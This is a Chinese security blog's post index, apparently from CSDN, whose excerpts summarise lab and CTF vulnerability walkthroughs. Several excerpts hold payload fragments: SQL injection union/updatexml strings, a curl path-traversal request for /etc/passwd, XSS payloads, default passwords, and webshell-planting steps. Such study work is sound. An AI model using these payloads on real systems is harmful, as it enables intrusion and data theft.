- 博客(50)
- 收藏
- 关注
原创 小说漫画系统 fileupload.php 任意文件上传漏洞复现
作者不对读者基于本文内容而产生的任何行为或后果承担责任。读者在使用本文所提供的信息时,必须遵守适用法律法规和相关服务协议,并独自承担所有风险和责任。1.向靶场发送如下数据包。
2024-10-13 17:01:47
649
原创 【漏洞复现】(腾达)Tenda路由器 密码信息泄露漏洞
作者不对读者基于本文内容而产生的任何行为或后果承担责任。读者在使用本文所提供的信息时,必须遵守适用法律法规和相关服务协议,并独自承担所有风险和责任。
2024-10-13 15:15:23
586
原创 FastBee开源物联网平台download接口存在任意文件读取漏洞 附POC
FastBee是一个简单易用的开源物联网平台,更适合中小企业和个人快速学习和搭建设备联网平台。
2024-10-13 14:55:30
431
原创 常见的框架漏洞
环境配置靶场:vulhub/thinkphp/5-rcedocker-compose up -d #启动环境访问靶场:http://172.16.1.4:8080/index.php远程命令执行POC:远程代码执行POC:getshell?>" >>1.php根目录生成1.php 文件,输出phpinfo。
2024-09-23 18:16:29
1082
原创 Apache 中间件漏洞
使⽤curl http://172.16.1.4:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd。访问172.16.1.4:8080。
2024-09-22 15:03:23
222
原创 Jboss常⻅中间件漏洞
3.然后找到jboss.deployment (jboss ⾃带得部署功能) 中的flavor=URL,type=DeploymentScanner点进去(通过URL的⽅式远程部署)在JMX Console⻚⾯点击jboss.system链接,在Jboss.system⻚⾯中点击service=MainDeployer,如下。因为使⽤环境不存在该漏洞所以需要输⼊账户密码:admin vulhub。
2024-09-22 09:42:55
545
原创 Weblogic中间件漏洞
环境搭建漏洞复现 默认账号密码:weblogic/Oracle@123 weblogic常⽤弱⼝令:https://cirt.net/passwords?1.登录后台后,点击部署,点击安装,点击上传⽂件。2.上传war包,jsp⽊⻢压缩成zip,修改后缀为war,上传然后⼀直下⼀步3.访问部署好的war 192.168.0.115:7001/1/1.jsp。
2024-09-20 20:14:00
747
原创 tomcat中间件漏洞CVE-2017-12615,后台弱口令部署war包,CVE-2020-1938
2. ⽂件上传成功后,默认会在⽹站根⽬录下⽣成和war包名称⼀致得⽬录,然后⽬录中得⽊⻢就是压缩 前的⽂件名。漏洞复现 http://172.16.1.22:8080/manager/html。制作WAR包,将JSP⽊⻢压缩为ZIP格式,然后修改后缀为war就可以了。1.⾸⻚抓包,修改为 PUT ⽅式提交。默认密码:tomcat/tomcat。一.CVE-2017-12615。三.CVE-2020-1938。二.后台弱口令部署war包。
2024-09-20 18:12:24
519
原创 aspcms webshell漏洞复现
在抓取的数据包中修改 slideTextStatus 字段的值为以下代码并进行发包 访问影响文件。【ip】/admin_aspcms/login.asp访问后台,admin 123456登录。点击【扩展功能】【幻灯片设置】点击【保存】开启代理进行抓包。
2024-09-16 14:37:17
214
原创 dedecms靶场(四种webshell姿势)
点击【生成】【更新主页HTML】将主页位置修改为【./index.php】点击 【生成静态】点击 【更新主页HTML】 再次访问站点首页可发现变化..点击【模板】【默认模板管理】【index.htm】【修改】 在文件修改中添加一句话木马 保存。点击 【模块】 【广告管理】【增加一个新广告】在【广告内容】 处添加一句话木马点击 【确定】点击【系统】【sql命令行工具】写入一句话木马到网站目录下的1.php文件中,确定。一.登陆到后台点击【核心】【文件式管理器】【文件上传】将准备好的一句话木马上传。
2024-09-16 12:09:53
349
原创 sqlgun靶场攻略
进入靶场界面输入框测试回显点-1'union select 1,2,3#看看有木有回显点查看数据库名-1'union select 1,2,database()#查看表名-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='sqlgunnews'#查看admin表中列名-1'union select 1,2,grou
2024-09-13 20:30:28
215
原创 【vulhub】thinkphp5 2-rce 5.0.23-rce 5-rce 漏洞复现
【代码】【vulhub】thinkphp5 2-rce 5.0.23-rce 5-rce 漏洞复现。
2024-09-07 12:47:12
845
原创 代码执行漏洞-Log4j2漏洞
action= 这⾥有个参数可以传,可以按照上⾯的原理 先构造⼀个请求传过去存在JNDI注⼊那么ldap服务端会执⾏我们传上去的payload然后在DNSLOG 平台上那⾥留下记录,我们可以看到留下了访问记录并且前⾯的参数被执⾏后给我们回显了java的 版本号!开始反弹Shell准备 JNDI-Injection-Exploit 下载地址并构造PayLoad如下...启动!拿取JDK1.8并构造Payload且直接访问..可以看到⽹⻚被重定向到了我们的恶意类⽹址.反弹Shell-base64加密。
2024-09-07 10:51:52
565
原创 中间件漏洞解析
lls6.x在网站根目录下编写一个一句话木马然后进行访问lls7.x配置环境将 cgi.fix_pathinfo=1 前面的封号取消掉...并重启...利用姿势拿蚁剑进行链接。
2024-09-05 18:13:42
677
原创 hackme靶机通关攻略
数据改为1*,复制数据包到1.txt,发到kali里面。MD5解密superadmin 密码。搜索一本书抓包发放到重放器。sqlmap查看当前数据库。访问uploads文件夹。查看users表中列。
2024-09-04 16:59:44
317
原创 文件包含PHP伪协议利用方法
⽤途:读取压缩包内的⽂件(绝对路径 / 相对路径)⽤途:读取压缩包内的⽂件(绝对路径 / 相对路径)使⽤: file:// ⽂件的绝对路径和⽂件名。cmd=php://input抓包。⽤途:数据( RFC2397 )⽤途:常⽤于读取⽂件 / 源码。
2024-09-04 15:45:11
310
原创 tomato靶机通关攻略
将一句话木马作为ssh登录的用户名,然后登陆,密码随便输入,这样日志文件就会记录该用户登录失败的日志,而该用户的用户名就是我们的一句话木马。找到一个/antibot_image/ 目录,进而找到/antibots/目录。在kali里面进行目录扫描,找到一个antibot_image。页面通过image传参查看passwd文件。用kali去扫描端口,发现有3个开放端口。页面通过image传参查看日志文件。发现可能存在文件包含。
2024-09-04 15:08:44
460
原创 pikachu文件包含漏洞靶场攻略
创建一个2.php文件,里面输入<?filename后面输入../../../../../1.php访问php文件。Allow_url_include=on //默认关闭。fileinclude目录下找到shell.php文件。allow_url_fopen=on //默认打开。访问php文件,连接。
2024-09-04 10:59:50
575
原创 sql-labs61-65关通关攻略
?id=1')) and updatexml(1,concat(1,(select database())),1)--+?id=1')) and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+?id=1')) and updatexml(1,concat(1,(select group_concat(column
2024-09-02 14:26:49
1208
原创 sql-labs56-60通关攻略
?id=-1')union select 1,2,database()--+?id=-1')union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+ ?id=-1')union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=
2024-09-02 11:31:23
1042
原创 sql-labs51-55通关攻略
1'and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) --+' and updatexml(1,concat(0x7e,(select group_concat(column
2024-08-30 17:36:52
1145
原创 upload-labs闯关攻略
提前准备好的一个PHP木马,然后将后缀名改为jpg上传然后在上传的过程中利用抓包,将抓取到的包里面的后缀jpg改为php如图所示,然后放行接着我们去访问上传的图片信息,如下图所示就为成功。
2024-08-30 17:35:55
974
原创 vulhub xxe靶机
进入robots.txt里面会发现俩个目录然后我们进去xxe里面。可以看到关于密码和用户名的是xml,那么就可以考虑用xxe注入。解码出来是/etc/.flag.php然后重新修改xml。将admin.php改为flagmeout.php。可以看到有很多乱码,然后进行base64解码。进入xxe页面进行登录,burp抓包。解码后发现还需要进行以此md5解码。先用御剑扫描出ip然后进入网页。然后编成php文件进行访问。进行base32解密。
2024-08-29 17:53:13
839
原创 xss-labs 11-15关通关攻略
发现有cook值,在这里注入Referer:"onclick="alert(1)"type="text。在抓到的数据包中加入Referer:"onclick="alert(1)"type="text。二.在ua头注入 Referer:"onclick="alert(1)"type="text。点击f12 在图片标签里添加一个点击事件 οnclick='alert(1)'进入第12关发现没有注入点,进入源代码看哪里可以注入发现。src='./level1.php'文件。进如第13关,发现没有注入点。
2024-08-27 19:33:51
211
原创 sql-labs36-40通关攻略
id=-1%df%27%20union%20select%201,group_concat(id,username,0x3a,password),3%20from%20users--+进入重放器uname=-1%df' union select database(),2#&passwd=1&submit=Submitid=1%27--+id=1--+
2024-08-27 18:22:50
1305
原创 xss-labs靶场6-10关
没有输入的地方,就在URL中,尝试将隐藏标签显示出来。将javascript:alert(1)进行编码后。将javascript:alert(1)进行编码。使用a标签,发现a标签可以。后面再加上//http://然后将编码输入再次点击链接。点击一下输入框,完成。
2024-08-26 17:42:26
396
原创 sqli-labsSQL手工注入第26-30关
http://127.0.0.1/Less-26/?id=11%27%26extractvalue(1,concat(%27~%27,database(),%27~%27))%261=%27http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=%27security%27))),1
2024-08-24 20:25:28
1272
原创 pikachu-Cross-Site Scripting通过攻略
反射型xss(get)第一步:进入先将maxlength中的20修改大一些,以便我们可以输入更多的字符第二步:输入<script>alert(1)</script>成功爆破反射型xss(post)第一步:点击提示得到用户名和密码登录第二步:输入<script>alert(1)</script>成功爆破存储型xss在留言框里输入<script>alert(1)</script>成功爆
2024-08-22 17:39:38
386
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人